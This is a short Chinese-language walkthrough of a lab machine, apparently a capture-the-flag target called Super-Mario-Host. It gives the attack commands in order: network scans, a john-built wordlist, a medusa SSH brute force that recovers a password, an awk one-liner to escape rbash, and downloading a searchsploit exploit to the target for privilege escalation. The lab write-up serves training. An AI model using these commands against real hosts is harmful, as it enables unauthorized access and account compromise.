实验环境
靶机:超级玛丽(Super-Mario-Host-v1.0.1)
测试机:kali(IP:192.168.186.128),win10
实验过程
信息收集
主机发现
netdiscover -I eth0 -r 192.168.186.0/24
nmap -sn 192.168.186.0/24
arp-scan -l ,arp-scan 192.168.186.0/24
端口扫描
masscan -p 0-65535 --rate=10000 192.168.186.131
服务发现
nmap 192.168.186.131 -p 22,8180 -sV -O -T4
目录扫描
主页
根据上面的提示去设置hosts文件
在C:\Windows\System32\drivers\etc下设置hosts文件。
再去访问:
漏洞发现
在页面luigi.php发现关键信息
对用户名信息用john 生成字典文件u
john --wordlist=p.txt --stdout --rules > u
漏洞利用
medusa爆破出用户名:luigi 密码:luigi1
medusa -M ssh -h 192.168.186.131 -U u -P u
ssh登录,这里shell做了限制
提权
进行rbash绕过,https://www.freebuf.com/articles/system/188989.html
awk 'BEGIN {system("/bin/bash")}'
查看系统版本信息
lsb_release -a
searchsploit 搜寻相关提权脚本
python -m SimpleHTTPServer 8080,开启简易web服务,wget将脚本下载至靶机
编译运行
总结
在信息收集过程中,若找到一些关于用户,用户邮箱等的身份信息,可以用john生成对应字典,针对ssh,或网站后台进行爆破。
RBASH绕过